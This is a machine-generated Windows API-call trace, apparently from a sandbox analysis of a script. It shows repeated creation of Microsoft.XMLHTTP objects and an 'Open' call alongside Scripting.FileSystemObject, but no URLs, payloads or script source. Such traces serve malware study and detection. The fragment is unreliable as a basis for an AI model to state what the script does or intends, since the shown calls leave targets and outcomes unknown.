	[0341.774] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0341.774] SysStringLen (param_1=0x0) returned 0x0
	[0341.774] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0341.777] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0341.777] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0341.777] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0341.777] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0341.777] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0341.777] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0342.790] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0342.791] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0342.791] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0342.792] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0342.792] SysStringLen (param_1=0x0) returned 0x0
	[0342.792] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0342.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0342.792] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0342.792] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0342.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0342.792] ??2@YAPEAX_K@Z () returned 0x62f310
	[0342.792] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0342.792] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0342.792] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0342.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0342.792] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0342.792] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0342.793] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0342.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0342.795] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0342.795] SysStringLen (param_1=0x0) returned 0x0
	[0342.795] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0342.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0342.795] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0342.795] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0342.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0342.795] ??2@YAPEAX_K@Z () returned 0x62f330
	[0342.795] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0342.795] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0342.795] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0342.795] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0342.795] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0342.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0342.796] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0342.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0342.796] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0342.796] SysStringLen (param_1=0x0) returned 0x0
	[0342.796] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0342.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0342.796] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0342.796] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0342.796] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0342.796] ??2@YAPEAX_K@Z () returned 0x62f310
	[0342.796] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0342.796] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0342.797] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0342.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7720) returned 0x0
	[0342.797] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7720) returned 0x3
	[0342.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0342.797] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7720, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0342.797] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7720, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0342.797] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0342.797] SysStringLen (param_1=0x0) returned 0x0
	[0342.797] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0342.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0342.798] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0342.798] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0342.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0342.798] ??2@YAPEAX_K@Z () returned 0x62f330
	[0342.798] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0342.798] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0342.798] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0342.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0342.798] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0342.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0342.798] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0342.798] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0342.799] longjmp () 
	[0342.799] longjmp () 
	[0342.799] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0342.799] SysStringLen (param_1=0x0) returned 0x0
	[0342.799] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0342.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0342.799] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0342.799] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0342.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0342.799] ??2@YAPEAX_K@Z () returned 0x62f310
	[0342.799] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0342.799] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0342.799] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0342.799] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0342.800] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0342.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0342.800] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0342.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0342.800] longjmp () 
	[0342.800] longjmp () 
	[0342.800] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0342.800] SysStringLen (param_1=0x0) returned 0x0
	[0342.800] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0342.800] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0342.801] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7720) returned 0x0
	[0342.801] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
